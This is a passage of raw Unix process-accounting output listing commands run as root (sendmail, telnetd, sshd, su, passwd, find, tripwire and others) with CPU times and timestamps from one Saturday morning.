ttyp0 0.11 secs Sat Jun 3 08:52 4496 passwd S root ttyp0 0.11 secs Sat Jun 3 08:52 4491 sshd1 SF root __ 3.59 secs Sat Jun 3 07:35 4490 su S root ttyp5 0.06 secs Sat Jun 3 08:53 4489 su S root ttyp5 0.06 secs Sat Jun 3 08:53 4488 ls S root ttyp5 0.03 secs Sat Jun 3 08:53 4479 gzip S root ttyp5 0.23 secs Sat Jun 3 08:53 4478 tar S root ttyp5 0.05 secs Sat Jun 3 08:53 4472 bash S root ttyp5 0.11 secs Sat Jun 3 08:53 4471 sh S root ttyp5 0.09 secs Sat Jun 3 08:53 4468 ls S root ttyp5 0.02 secs Sat Jun 3 08:54 4467 less S root ttyp5 0.03 secs Sat Jun 3 08:54 4461 ls S root ttyp5 0.03 secs Sat Jun 3 08:54 4460 ls S root ttyp5 0.01 secs Sat Jun 3 08:54 4459 passwd S root ttyp0 0.11 secs Sat Jun 3 08:54 4458 less S root ttyp5 0.05 secs Sat Jun 3 08:54 4457 ls S root ttyp5 0.01 secs Sat Jun 3 08:54 4456 ls S root ttyp5 0.02 secs Sat Jun 3 08:54 4455 unzip S root ttyp5 0.06 secs Sat Jun 3 08:54 4443 ls S root ttyp5 0.02 secs Sat Jun 3 08:55 4442 bash SF root ttyp5 0.01 secs Sat Jun 3 08:55 4394 sendmail SF root __ 0.05 secs Sat Jun 3 08:56 4393 sendmail SF root __ 0.05 secs Sat Jun 3 08:56 4391 sendmail SF root __ 0.06 secs Sat Jun 3 08:57 4377 cat S root __ 0.01 secs Sat Jun 3 08:57 4375 sendmail SF root __ 0.01 secs Sat Jun 3 08:57 4374 sendmail S root __ 0.23 secs Sat Jun 3 08:57 4373 sh S root __ 0.01 secs Sat Jun 3 08:57 4372 sendmail SF root __ 0.02 secs Sat Jun 3 08:57 4363 sendmail SF root __ 0.05 secs Sat Jun 3 08:57 4362 sendmail SF root __ 0.05 secs Sat Jun 3 08:57 4360 sendmail SF root __ 0.03 secs Sat Jun 3 08:57 4346 sendmail SF root __ 0.03 secs Sat Jun 3 08:56 4344 less S root ttyp5 1.61 secs Sat Jun 3 08:55 4343 ls S root ttyp5 0.03 secs Sat Jun 3 08:58 4338 ls S root ttyp5 0.02 secs Sat Jun 3 08:58 4337 less S root ttyp5 0.03 secs Sat Jun 3 08:58 4266 proftpd S root __ 59.94 secs Sat Jun 3 08:46 4242 telnetd S root __ 0.14 secs Sat Jun 3 08:58 4238 ls S root ttyp0 0.03 secs Sat Jun 3 09:01 4231 sendmail SF root __ 0.03 secs Sat Jun 3 09:01 4230 sendmail SF root __ 0.05 secs Sat Jun 3 09:01 4223 sendmail SF root __ 0.05 secs Sat Jun 3 09:01 4222 proftpd S root __ 0.16 secs Sat Jun 3 09:01 4217 ls S root ttyp0 0.01 secs Sat Jun 3 09:02 4216 du S root ttyp0 0.02 secs Sat Jun 3 09:02 4214 ls S root ttyp0 0.02 secs Sat Jun 3 09:02 4205 cat S root __ 0.01 secs Sat Jun 3 09:02 4204 sendmail SF root __ 0.01 secs Sat Jun 3 09:02 4203 sendmail S root __ 0.22 secs Sat Jun 3 09:02 4202 sh S root __ 0.01 secs Sat Jun 3 09:02 4201 sendmail SF root __ 0.02 secs Sat Jun 3 09:02 4197 telnetd S root __ 0.16 secs Sat Jun 3 09:00 4174 telnetd S root __ 0.08 secs Sat Jun 3 09:02 4172 zip S root ttyp0 23.28 secs Sat Jun 3 09:02 4163 ls S root ttyp0 0.02 secs Sat Jun 3 09:03 4161 telnetd S root __ 0.08 secs Sat Jun 3 09:02 4158 cp S root ttyp0 0.75 secs Sat Jun 3 09:03 4150 mv S root ttyp0 0.01 secs Sat Jun 3 09:04 4145 ls S root ttyp0 0.22 secs Sat Jun 3 09:04 4141 telnetd S root __ 0.09 secs Sat Jun 3 09:04 4130 telnetd S root __ 0.36 secs Sat Jun 3 08:35 4102 chown S root ttyp0 0.01 secs Sat Jun 3 09:05 4101 ls S root ttyp0 0.19 secs Sat Jun 3 09:05 4071 bash S root ttyp0 0.69 secs Sat Jun 3 08:51 4070 sh S root ttyp0 0.09 secs Sat Jun 3 08:51 4068 sendmail SF root __ 0.05 secs Sat Jun 3 09:05 4066 sendmail SF root __ 0.05 secs Sat Jun 3 09:05 4064 sendmail SF root __ 0.05 secs Sat Jun 3 09:05 4057 tripwire S root ttyp5 338.52 secs Sat Jun 3 08:58 4056 csi.sh S root ttyp5 0.03 secs Sat Jun 3 08:58 4036 telnetd S root __ 0.08 secs Sat Jun 3 09:05 3993 cat S root __ 0.01 secs Sat Jun 3 09:07 3990 sendmail SF root __ 0.01 secs Sat Jun 3 09:07 3989 sendmail S root __ 0.20 secs Sat Jun 3 09:07 3988 sh S root __ 0.01 secs Sat Jun 3 09:07 3987 sendmail SF root __ 0.01 secs Sat Jun 3 09:07 3962 sendmail SF root __ 0.05 secs Sat Jun 3 09:07 3960 sendmail SF root __ 0.06 secs Sat Jun 3 09:07 3959 sendmail SF root __ 0.03 secs Sat Jun 3 09:06 3958 sendmail SF root __ 0.05 secs Sat Jun 3 09:07 3956 sendmail SF root __ 0.06 secs Sat Jun 3 09:07 3955 sendmail SF root __ 0.05 secs Sat Jun 3 09:07 3934 less S root ttyp5 0.06 secs Sat Jun 3 09:07 3933 ls S root ttyp5 0.01 secs Sat Jun 3 09:08 3927 sendmail SF root __ 0.05 secs Sat Jun 3 09:08 3926 sendmail SF root __ 0.05 secs Sat Jun 3 09:08 3925 sendmail SF root __ 0.05 secs Sat Jun 3 09:08 3924 sendmail SF root __ 0.03 secs Sat Jun 3 09:08 3921 sendmail SF root __ 0.06 secs Sat Jun 3 09:08 3920 sendmail SF root __ 0.08 secs Sat Jun 3 09:08 3919 rm S root ttyp5 0.01 secs Sat Jun 3 09:08 3911 Widget.c S root __ 0.08 secs Sat Jun 3 09:08 3910 telnetd S root __ 0.09 secs Sat Jun 3 09:08 3909 ls S root ttyp5 0.31 secs Sat Jun 3 09:09 3908 sendmail SF root __ 0.08 secs Sat Jun 3 09:09 3907 sendmail SF root __ 0.03 secs Sat Jun 3 09:09 3906 ls S root ttyp7 0.05 secs Sat Jun 3 09:09 3904 sendmail SF root __ 0.08 secs Sat Jun 3 09:09 3903 ls S root ttyp7 0.02 secs Sat Jun 3 09:09 3901 cat S root ttyp7 0.01 secs Sat Jun 3 09:09 3900 ls S root ttyp5 0.05 secs Sat Jun 3 09:09 3899 ls S root ttyp5 0.33 secs Sat Jun 3 09:09 3893 cat S root ttyp7 0.03 secs Sat Jun 3 09:09 3892 cat S root ttyp7 0.02 secs Sat Jun 3 09:09 3868 ls S root ttyp5 0.33 secs Sat Jun 3 09:10 3867 pico S root ttyp7 0.25 secs Sat Jun 3 09:09 3866 rm S root ttyp7 0.01 secs Sat Jun 3 09:10 3861 sendmail SF root __ 0.05 secs Sat Jun 3 09:10 3860 sendmail SF root __ 0.05 secs Sat Jun 3 09:10 3858 sendmail SF root __ 0.06 secs Sat Jun 3 09:10 3851 grep S root ttyp5 0.05 secs Sat Jun 3 09:10 3845 find S root ttyp5 0.66 secs Sat Jun 3 09:10 3841 pico S root ttyp7 0.05 secs Sat Jun 3 09:10 3838 grep S root ttyp5 0.01 secs Sat Jun 3 09:10 3834 find S root ttyp5 0.08 secs Sat Jun 3 09:10 3830 sendmail SF root __ 0.05 secs Sat Jun 3 09:10 3829 sendmail SF root __ 0.05 secs Sat Jun 3 09:10 3828 pico S root ttyp7 0.03 secs Sat Jun 3 09:10 3826 sendmail SF root __ 0.06 secs Sat Jun 3 09:11 3822 ls S root ttyp7 0.02 secs Sat Jun 3 09:11 3808 sendmail SF root __ 0.06 secs Sat Jun 3 09:11 3807 sendmail SF root __ 0.05 secs Sat Jun 3 09:11 3805 sendmail SF root __ 0.06 secs Sat Jun 3 09:11 3772 cat S root __ 0.01 secs Sat Jun 3 09:12 3771 sendmail SF root __ 0.01 secs Sat Jun 3 09:12 3770 sendmail S root __ 0.25 secs Sat Jun 3 09:12 3769 sh S root __ 0.01 secs Sat Jun 3 09:12 3768 sendmail SF root __ 0.02 secs Sat Jun 3 09:12 3767 proftpd S root __ 0.22 secs Sat Jun 3 09:12 3763 sendmail SF root __ 0.05 secs Sat Jun 3 09:11 3751 sshd1 SF root __ 0.33 secs Sat Jun 3 09:13 3743 su S root ttyp3 0.14 secs Sat Jun 3 09:13 3730 mv S root ttyp0 0.01 secs Sat Jun 3 09:14 3729 chown S root ttyp0 0.02 secs Sat Jun 3 09:14 3727 bash S root ttyp0 0.25 secs Sat Jun 3 09:14 3726 sh S root ttyp0 0.11 secs Sat Jun 3 09:14 3724 su S root ttyp0 0.11 secs Sat Jun 3 09:14 3710 sendmail SF root __ 0.16 secs Sat Jun 3 09:15 3709 sendmail SF root __ 0.05 secs Sat Jun 3 09:15 3707 sendmail SF root __ 0.16 secs Sat Jun 3 09:15 3687 sendmail SF root __ 0.03 secs Sat Jun 3 09:15 3686 sendmail SF root __ 0.05 secs Sat Jun 3 09:14 3656 telnetd S root __ 0.17 secs Sat Jun 3 09:15 3644 telnetd S root __ 0.20 secs Sat Jun 3 09:13 3598 cat S root __ 0.01 secs Sat Jun 3 09:17 3597 passwd S root ttyp7 0.11 secs Sat Jun 3 09:17 3596 sendmail SF root __ 0.01 secs Sat Jun 3 09:17 3595 sendmail S root __ 0.23 secs Sat Jun 3 09:17 3594 sh S root __ 0.01 secs Sat Jun 3 09:17 3593 sendmail SF root __ 0.02 secs Sat Jun 3 09:17 3592 passwd S root ttyp7 0.12 secs Sat Jun 3 09:17 3589 bash S root ttyp7 0.31 secs Sat Jun 3 09:09 3587 sh S root ttyp7 0.11 secs Sat Jun 3 09:08 3583 sh S root ttyp7 0.11 secs Sat Jun 3 09:18 3464 cat S root __ 0.01 secs Sat Jun 3 09:22 3463 sendmail SF root __ 0.01 secs Sat Jun 3 09:22 3462 sendmail S root __ 0.25 secs Sat Jun 3 09:22 3461 sh S root __ 0.01 secs Sat Jun 3 09:22 3460 sendmail SF root __ 0.02 secs Sat Jun 3 09:22 3387 sendmail SF root __ 0.05 secs Sat Jun 3 09:25 3386 sendmail SF root __ 0.06 secs Sat Jun 3 09:25 3384 sendmail SF root __ 0.06 secs Sat Jun 3 09:25 3382 sendmail SF root __ 0.05 secs Sat Jun 3 09:25 3381 sendmail SF root __ 0.05 secs Sat Jun 3 09:25 3379 sendmail SF root __ 0.06 secs Sat Jun 3 09:25 3378 sendmail SF root __ 0.05 secs Sat Jun 3 09:25 3376 sendmail SF root __ 0.06 secs Sat Jun 3 09:25 3375 sendmail SF root __ 0.08 secs Sat Jun 3 09:25 3373 sendmail SF root __ 0.08 secs Sat Jun 3 09:25 3372 sendmail SF root __ 0.08 secs Sat Jun 3 09:25 3370 sendmail SF root __ 0.08 secs Sat Jun 3 09:25 3369 sendmail SF root __ 0.06 secs Sat Jun 3 09:25 3367 sendmail SF root __ 0.08 secs Sat Jun 3 09:25 3312 sendmail SF root __ 0.12 secs Sat Jun 3 09:24 3298 telnetd S root __ 0.17 secs Sat Jun 3 09:24 3297 find S root ttyp5 57.63 secs Sat Jun 3 09:11 3296 grep S root ttyp5 5.78 secs Sat Jun 3 09:11 3295 sendmail SF root __ 0.09 secs Sat Jun 3 09:26 3294 sendmail SF root __ 0.09 secs Sat Jun 3 09:26 3291 sendmail SF root __ 0.11 secs Sat Jun 3 09:26 3290 sendmail SF root __ 0.09 secs Sat Jun 3 09:26 3289 sendmail SF root __ 0.08 secs Sat Jun 3 09:26 3286 sendmail SF root __ 0.03 secs Sat Jun 3 09:26 3283 sendmail SF root __ 0.25 secs Sat Jun 3 09:26 3273 ls S root ttyp5 0.03 secs Sat Jun 3 09:27 3261 cat S root __ 0.01 secs Sat Jun 3 09:27 3260 sendmail SF root __ 0.01 secs Sat Jun 3 09:27 3259 sendmail S root __ 0.20 secs Sat Jun 3 09:27 3258 sh S root __ 0.01 secs Sat Jun 3 09:27 3257 sendmail SF root __ 0.02 secs Sat Jun 3 09:27 3256 top S root ttyp5 0.16 secs Sat Jun 3 09:27 3252 ls S root ttyp5 0.03 secs Sat Jun 3 09:27 3251 less S root ttyp5 0.03 secs Sat Jun 3 09:27 3248 sendmail SF root __ 0.02 secs Sat Jun 3 09:26 3246 sendmail SF root __ 0.11 secs Sat Jun 3 09:27 3244 sendmail SF root __ 0.03 secs Sat Jun 3 09:27 3243 sendmail SF root __ 0.31 secs Sat Jun 3 09:27 3238 sendmail SF root __ 0.16 secs Sat Jun 3 09:27 3236 sendmail SF root __ 0.03 secs Sat Jun 3 09:27 3235 sendmail SF root __ 0.45 secs Sat Jun 3 09:27 3232 passwd S root ttyp0 0.09 secs Sat Jun 3 09:27 3220 sendmail SF root __ 0.03 secs Sat Jun 3 09:26 3213 telnetd S root __ 0.08 secs Sat Jun 3 09:28 3210 passwd S root ttyp0 0.12 secs Sat Jun 3 09:28 3198 sendmail SF root __ 0.03 secs Sat Jun 3 09:26 3181 bash S root ttyp5 0.77 secs Sat Jun 3 08:54 3179 sh S root ttyp5 0.09 secs Sat Jun 3 08:54 3176 sshd1 SF root __ 2.56 secs Sat Jun 3 08:50 3165 sshd1 SF root __ 2.78 secs Sat Jun 3 08:46 3141 sendmail SF root __ 0.05 secs Sat Jun 3 09:30 3140 sendmail SF root __ 0.03 secs Sat Jun 3 09:30 3138 sshd1 SF root __ 2.22 secs Sat Jun 3 09:12 3136 sendmail SF root __ 0.06 secs Sat Jun 3 09:30 3100 su S root ttyp1 0.06 secs Sat Jun 3 09:31 3096 su S root ttyp1 0.06 secs Sat Jun 3 09:31 3095 su S root ttyp1 0.06 secs Sat Jun 3 09:31 3094 su S root ttyp1 0.06 secs Sat Jun 3 09:31 3083 cat S root __ 0.01 secs Sat Jun 3 09:32 3082 sendmail SF root __ 0.01 secs Sat Jun 3 09:32 3081 sendmail S root __ 0.20 secs Sat Jun 3 09:32 3080 sh S root __ 0.01 secs Sat Jun 3 09:32 3079 sendmail SF root __ 0.01 secs Sat Jun 3 09:32 3078 ls S root ttyp1 0.01 secs Sat Jun 3 09:32 3077 rm S root ttyp1 0.01 secs Sat Jun 3 09:32 3076 bash S root ttyp1 0.11 secs Sat Jun 3 09:32 3075 sh S root ttyp1 0.08 secs Sat Jun 3 09:31 3073 sshd1 SF root __ 0.34 secs Sat Jun 3 09:31 3072 sendmail SF root __ 0.05 secs Sat Jun 3 09:32 3071 sendmail SF root __ 0.02 secs Sat Jun 3 09:32 3069 sendmail SF root __ 0.05 secs Sat Jun 3 09:32 3063 su S root ttyp0 0.08 secs Sat Jun 3 09:32 3040 sendmail SF root __ 0.06 secs Sat Jun 3 09:34 3038 sendmail SF root __ 0.03 secs Sat Jun 3 09:34 3037 sendmail SF root __ 0.08 secs Sat Jun 3 09:34 3036 sendmail SF root __ 0.03 secs Sat Jun 3 09:34 3034 sendmail SF root __ 0.09 secs Sat Jun 3 09:34 3033 sendmail SF root __ 0.11 secs Sat Jun 3 09:34 3008 telnetd S root __ 0.08 secs Sat Jun 3 09:35 3001 sendmail SF root __ 0.17 secs Sat Jun 3 09:35 3000 sendmail SF root __ 0.03 secs Sat Jun 3 09:35 2998 sendmail SF root __ 0.12 secs Sat Jun 3 09:35 2977 sendmail SF root __ 0.14 secs Sat Jun 3 09:37 2975 sendmail SF root __ 0.14 secs Sat Jun 3 09:37 2963 cat S root __ 0.01 secs Sat Jun 3 09:37 2962 sendmail SF root __ 0.01 secs Sat Jun 3 09:37 2961 sendmail S root __ 0.20 secs Sat Jun 3 09:37 2960 sh S root __ 0.01 secs Sat Jun 3 09:37 2959 sendmail SF root __ 0.01 secs Sat Jun 3 09:37 2938 sendmail SF root __ 0.05 secs Sat Jun 3 09:37 2936 sendmail SF root __ 0.05 secs Sat Jun 3 09:37 2912 sendmail SF root __ 0.12 secs Sat Jun 3 09:39 2911 sendmail SF root __ 0.03 secs Sat Jun 3 09:39 2910 sendmail SF root __ 0.11 secs Sat Jun 3 09:39 2908 sendmail SF root __ 0.09 secs Sat Jun 3 09:39 2906 sendmail SF root __ 0.11 secs Sat Jun 3 09:39 2900 sendmail SF root __ 0.02 secs Sat Jun 3 09:37 2828 sendmail SF root __ 0.03 secs Sat Jun 3 09:39 2824 sendmail SF root __ 0.05 secs Sat Jun 3 09:41 2822 sendmail SF root __ 0.05 secs Sat Jun 3 09:41 2821 sendmail SF root __ 0.03 secs Sat Jun 3 09:40 2815 sendmail SF root __ 0.05 secs Sat Jun 3 09:41 2810 sendmail SF root __ 0.05 secs Sat Jun 3 09:41 2806 sendmail SF root __ 0.02 secs Sat Jun 3 09:41 2798 cat S root __ 0.01 secs Sat Jun 3 09:42 2797 sendmail SF root __ 0.01 secs Sat Jun 3 09:42 2796 sendmail S root __ 0.20 secs Sat Jun 3 09:42 2795 sh S root __ 0.01 secs Sat Jun 3 09:42 2794 sendmail SF root __ 0.01 secs Sat Jun 3 09:42 2784 sendmail SF root __ 0.03 secs Sat Jun 3 09:37 2777 sendmail SF root __ 0.03 secs Sat Jun 3 09:41 2766 su S root ttyp0 0.06 secs Sat Jun 3 09:33 2764 sendmail SF root __ 0.05 secs Sat Jun 3 09:44 2762 sendmail SF root __ 0.05 secs Sat Jun 3 09:44 2753 sendmail SF root __ 0.05 secs Sat Jun 3 09:44 2751 sendmail SF root __ 0.05 secs Sat Jun 3 09:44 2750 sendmail SF root __ 0.05 secs Sat Jun 3 09:44 2717 more S root ttyp7 0.11 secs Sat Jun 3 09:33 2716 sh S root ttyp7 0.01 secs Sat Jun 3 09:33 2715 man S root ttyp7 0.02 secs Sat Jun 3 09:33 2666 cat S root __ 0.01 secs Sat Jun 3 09:47 2665 sendmail SF root __ 0.01 secs Sat Jun 3 09:47 2664 sendmail S root __ 0.19 secs Sat Jun 3 09:47 2663 sh S root __ 0.01 secs Sat Jun 3 09:47 2662 sendmail SF root __ 0.01 secs Sat Jun 3 09:47 2651 ls S root ttyp1 0.03 secs Sat Jun 3 09:47 2643 lastcomm S root ttyp1 11.84 secs Sat Jun 3 09:47 2613 less S root ttyp1 0.39 secs Sat Jun 3 09:48 2612 ls S root ttyp1 0.01 secs Sat Jun 3 09:49 2611 ls S root ttyp1 0.03 secs Sat Jun 3 09:49 2610 ls S root ttyp1 0.01 secs Sat Jun 3 09:49 2609 ls S root ttyp1 0.01 secs Sat Jun 3 09:49 2607 finger S root ttyp1 0.08 secs Sat Jun 3 09:49 2606 ls S root ttyp1 0.01 secs Sat Jun 3 09:49 2605 ls S root ttyp1 0.03 secs Sat Jun 3 09:49 2604 ls S root ttyp1 0.01 secs Sat Jun 3 09:49 2603 date S root ttyp1 0.01 secs Sat Jun 3 09:49 2602 ls S root ttyp1 0.01 secs Sat Jun 3 09:49 2562 sendmail SF root __ 0.05 secs Sat Jun 3 09:50 2561 sendmail SF root __ 0.03 secs Sat Jun 3 09:50 2559 sendmail SF root __ 0.05 secs Sat Jun 3 09:50 2554 proftpd S root __ 0.67 secs Sat Jun 3 09:40 2549 less S root ttyp1 3.84 secs Sat Jun 3 09:50 2548 ls S root ttyp1 0.01 secs Sat Jun 3 09:50 2544 ls S root ttyp1 0.01 secs Sat Jun 3 09:51 2543 ls S root ttyp1 0.02 secs Sat Jun 3 09:51 2542 ls S root ttyp1 0.02 secs Sat Jun 3 09:51 2541 sendmail SF root __ 0.05 secs Sat Jun 3 09:51 2540 sendmail SF root __ 0.03 secs Sat Jun 3 09:51 2538 sendmail SF root __ 0.05 secs Sat Jun 3 09:51 2537 ls S root ttyp1 0.02 secs Sat Jun 3 09:51 2536 sendmail SF root __ 0.05 secs Sat Jun 3 09:51 2535 sendmail SF root __ 0.03 secs Sat Jun 3 09:51 2531 ls S root ttyp1 0.02 secs Sat Jun 3 09:51 2529 sendmail SF root __ 0.06 secs Sat Jun 3 09:51 2520 telnetd S root __ 0.06 secs Sat Jun 3 09:51 2519 sendmail SF root __ 0.06 secs Sat Jun 3 09:51 2518 sendmail SF root __ 0.03 secs Sat Jun 3 09:51 2512 sshd1 SF root __ 0.17 secs Sat Jun 3 09:51 2511 sendmail SF root __ 0.11 secs Sat Jun 3 09:51 2488 cat S root __ 0.01 secs Sat Jun 3 09:52 2487 sendmail SF root __ 0.01 secs Sat Jun 3 09:52 2486 sendmail S root __ 0.19 secs Sat Jun 3 09:52 2485 sh S root __ 0.01 secs Sat Jun 3 09:52 2484 sendmail SF root __ 0.01 secs Sat Jun 3 09:52 2478 less S root ttyp1 0.06 secs Sat Jun 3 09:51 2464 ls S root ttyp1 0.01 secs Sat Jun 3 09:52 2460 strings S root ttyp1 0.02 secs Sat Jun 3 09:53 2454 strings S root ttyp1 0.01 secs Sat Jun 3 09:53 2442 ls S root ttyp1 0.01 secs Sat Jun 3 09:53 2436 find S root ttyp1 1.86 secs Sat Jun 3 09:54 2432 ls S root ttyp1 0.41 secs Sat Jun 3 09:54 2431 grep S root ttyp1 0.01 secs Sat Jun 3 09:54 2429 find S root ttyp1 0.12 secs Sat Jun 3 09:54 2428 ls S root ttyp1 0.41 secs Sat Jun 3 09:54 2420 id S root ttyp1 0.01 secs Sat Jun 3 09:54 2371 sendmail SF root __ 0.08 secs Sat Jun 3 09:55 2369 sendmail SF root __ 0.08 secs Sat Jun 3 09:55 2355 telnetd S root __ 0.06 secs Sat Jun 3 09:55 2351 sendmail SF root __ 0.06 secs Sat Jun 3 09:56 2348 sendmail SF root __ 0.06 secs Sat Jun 3 09:56 2347 sendmail SF root __ 0.02 secs Sat Jun 3 09:55 2335 sendmail SF root __ 0.03 secs Sat Jun 3 09:43 2313 sendmail SF root __ 0.05 secs Sat Jun 3 09:56 2311 sendmail SF root __ 0.06 secs Sat Jun 3 09:57 2310 sendmail SF root __ 0.03 secs Sat Jun 3 09:56 2309 sendmail SF root __ 0.03 secs Sat Jun 3 09:55 2296 cat S root __ 0.01 secs Sat Jun 3 09:57 2295 sendmail SF root __ 0.01 secs Sat Jun 3 09:57 2294 sendmail S root __ 0.20 secs Sat Jun 3 09:57 2293 sh S root __ 0.01 secs Sat Jun 3 09:57 2292 sendmail SF root __ 0.02 secs Sat Jun 3 09:57 2274 sendmail SF root __ 0.03 secs Sat Jun 3 09:56 2273 sendmail SF root __ 0.05 secs Sat Jun 3 09:58 2272 sendmail SF root __ 0.02 secs Sat Jun 3 09:58 2270 sendmail SF root __ 0.05 secs Sat Jun 3 09:58 2258 sendmail SF root __ 0.05 secs Sat Jun 3 09:59 2257 sendmail SF root __ 0.03 secs Sat Jun 3 09:58 2255 sendmail SF root __ 0.05 secs Sat Jun 3 09:59 2254 sendmail SF root __ 0.05 secs Sat Jun 3 09:59 2252 sendmail SF root __ 0.05 secs Sat Jun 3 09:59 2251 sendmail SF root __ 0.02 secs Sat Jun 3 09:59 2208 sendmail SF root __ 0.06 secs Sat Jun 3 10:00 2207 sendmail SF root __ 0.03 secs Sat Jun 3 10:00 2204 sendmail SF root __ 0.14 secs Sat Jun 3 10:00 2200 sendmail SF root __ 0.03 secs Sat Jun 3 10:01 2199 sendmail SF root __ 0.02 secs Sat Jun 3 10:01 2196 sendmail SF root __ 0.14 secs Sat Jun 3 10:01 2187 sendmail SF root __ 0.05 secs Sat Jun 3 10:01 2185 sendmail SF root __ 0.05 secs Sat Jun 3 10:01 2183 sendmail SF root __ 0.02 secs Sat Jun 3 10:01 2174 telnetd S root __ 0.19 secs Sat Jun 3 09:55 2131 cat S root __ 0.01 secs Sat Jun 3 10:02 2130 sendmail SF root __ 0.01 secs Sat Jun 3 10:02 2129 sendmail S root __ 0.20 secs Sat Jun 3 10:02 2128 sh S root __ 0.01 secs Sat Jun 3 10:02 2127 sendmail SF root __ 0.02 secs Sat Jun 3 10:02 2126 sendmail SF root __ 0.12 secs Sat Jun 3 10:02 2124 sendmail SF root __ 0.12 secs Sat Jun 3 10:02 2123 sendmail SF root __ 0.02 secs Sat Jun 3 10:02 2069 sendmail SF root __ 0.05 secs Sat Jun 3 10:05 2067 sendmail SF root __ 0.06 secs Sat Jun 3 10:05 2066 sendmail SF root __ 0.03 secs Sat Jun 3 10:05 2008 cat S root __ 0.01 secs Sat Jun 3 10:07 2007 sendmail SF root __ 0.01 secs Sat Jun 3 10:07 2006 sendmail S root __ 0.20 secs Sat Jun 3 10:07 2005 sh S root __ 0.01 secs Sat Jun 3 10:07 2004 sendmail SF root __ 0.01 secs Sat Jun 3 10:07 1993 sendmail SF root __ 0.05 secs Sat Jun 3 10:07 1992 sendmail SF root __ 0.03 secs Sat Jun 3 10:07 1989 sendmail SF root __ 0.05 secs Sat Jun 3 10:07 1987 sendmail SF root __ 0.05 secs Sat Jun 3 10:07 1986 sendmail SF root __ 0.03 secs Sat Jun 3 10:07 1984 sendmail SF root __ 0.05 secs Sat Jun 3 10:07 1983 sendmail SF root __ 0.05 secs Sat Jun 3 10:07 1982 sendmail SF root __ 0.03 secs Sat Jun 3 10:07 1980 sendmail SF root __ 0.05 secs Sat Jun 3 10:07 1974 sendmail SF root __ 0.05 secs Sat Jun 3 10:07 1973 sendmail SF root __ 0.03 secs Sat Jun 3 10:07 1971 sendmail SF root __ 0.05 secs Sat Jun 3 10:07 1942 sendmail SF root __ 0.14 secs Sat Jun 3 10:09 1940 sendmail SF root __ 0.14 secs Sat Jun 3 10:09 1939 sendmail SF root __ 0.02 secs Sat Jun 3 10:09 1906 sendmail SF root __ 0.05 secs Sat Jun 3 10:10 1902 sendmail SF root __ 0.05 secs Sat Jun 3 10:10 1900 sendmail SF root __ 0.05 secs Sat Jun 3 10:10 1889 telnetd S root __ 0.12 secs Sat Jun 3 10:01 1862 telnetd S root __ 0.11 secs Sat Jun 3 10:09 1856 telnetd S root __ 0.08 secs Sat Jun 3 09:51 1842 sendmail SF root __ 0.14 secs Sat Jun 3 10:12 1840 sendmail SF root __ 0.12 secs Sat Jun 3 10:12 1832 cat S root __ 0.01 secs Sat Jun 3 10:12 1831 sendmail SF root __ 0.01 secs Sat Jun 3 10:12 1830 sendmail S root __ 0.20 secs Sat Jun 3 10:12 1829 sh S root __ 0.01 secs Sat Jun 3 10:12 1828 sendmail SF root __ 0.02 secs Sat Jun 3 10:12 1824 sendmail SF root __ 0.02 secs Sat Jun 3 10:11 1814 sendmail SF root __ 0.03 secs Sat Jun 3 10:12 1799 proftpd S root __ 1.08 secs Sat Jun 3 09:50 1782 sendmail SF root __ 0.11 secs Sat Jun 3 10:15 1780 sendmail SF root __ 0.11 secs Sat Jun 3 10:15 1751 sendmail SF root __ 0.05 secs Sat Jun 3 10:15 1723 sendmail SF root __ 0.08 secs Sat Jun 3 10:16 1722 sendmail SF root __ 0.03 secs Sat Jun 3 10:16 1715 sendmail SF root __ 0.08 secs Sat Jun 3 10:16 1693 cat S root __ 0.01 secs Sat Jun 3 10:17 1692 sendmail SF root __ 0.01 secs Sat Jun 3 10:17 1691 sendmail S root __ 0.22 secs Sat Jun 3 10:17 1690 sh S root __ 0.01 secs Sat Jun 3 10:17 1689 sendmail SF root __ 0.02 secs Sat Jun 3 10:17 1636 telnetd S root __ 0.08 secs Sat Jun 3 10:18 1627 sendmail SF root __ 0.03 secs Sat Jun 3 10:18 1622 telnetd S root __ 0.08 secs Sat Jun 3 10:18 1620 sendmail SF root __ 0.06 secs Sat Jun 3 10:19 1619 sendmail SF root __ 0.02 secs Sat Jun 3 10:19 1617 sendmail SF root __ 0.08 secs Sat Jun 3 10:19 1615 sshd1 SF root __ 0.23 secs Sat Jun 3 10:19 1593 sshd1 SF root __ 0.25 secs Sat Jun 3 10:19 1525 screen-3 S root ttyp1 0.05 secs Sat Jun 3 10:21 1524 screen-3 S root ttyp1 0.05 secs Sat Jun 3 10:21 1522 bash S root ttyp7 0.09 secs Sat Jun 3 09:33 1518 ls S root ttyp1 0.03 secs Sat Jun 3 10:21 1517 sh S root ttyp7 0.08 secs Sat Jun 3 09:33 1497 cat S root __ 0.01 secs Sat Jun 3 10:22 1496 sendmail SF root __ 0.01 secs Sat Jun 3 10:22 1495 sendmail S root __ 0.20 secs Sat Jun 3 10:22 1494 sh S root __ 0.01 secs Sat Jun 3 10:22 1493 sendmail SF root __ 0.01 secs Sat Jun 3 10:22 1491 less S root ttyp1 0.05 secs Sat Jun 3 10:21 1488 grep S root ttyp1 0.06 secs Sat Jun 3 10:22 1487 whereis S root ttyp1 0.01 secs Sat Jun 3 10:22 1486 less S root ttyp1 0.02 secs Sat Jun 3 10:22 1480 sshd1 SF root __ 0.23 secs Sat Jun 3 10:23 1454 man S root ttyp1 0.06 secs Sat Jun 3 10:23 1445 less S root ttyp1 0.03 secs Sat Jun 3 10:23 1444 ls S root ttyp1 0.01 secs Sat Jun 3 10:23 1443 ls S root ttyp1 0.03 secs Sat Jun 3 10:24 1435 less S root ttyp1 1.89 secs Sat Jun 3 10:24 1434 less S root ttyp1 0.02 secs Sat Jun 3 10:24 1433 ls S root ttyp1 0.01 secs Sat Jun 3 10:24 1432 ls S root ttyp1 0.01 secs Sat Jun 3 10:24 1431 sendmail SF root __ 0.72 secs Sat Jun 3 10:23 1430 ls S root ttyp1 0.01 secs Sat Jun 3 10:24 1428 sendmail SF root __ 0.05 secs Sat Jun 3 10:23 1420 sendmail SF root __ 1.14 secs Sat Jun 3 10:24 1385 telnetd S root __ 0.08 secs Sat Jun 3 10:24 1384 less S root ttyp1 0.22 secs Sat Jun 3 10:24 1373 last S root ttyp1 0.05 secs Sat Jun 3 10:25 1366 telnetd S root __ 0.20 secs Sat Jun 3 10:14 1365 ls S root ttyp1 0.01 secs Sat Jun 3 10:25 1362 telnetd S root __ 0.08 secs Sat Jun 3 10:21 1358 ls S root ttyp1 0.01 secs Sat Jun 3 10:25 1357 ls S root ttyp1 0.05 secs Sat Jun 3 10:25 1353 ls S root ttyp1 0.01 secs Sat Jun 3 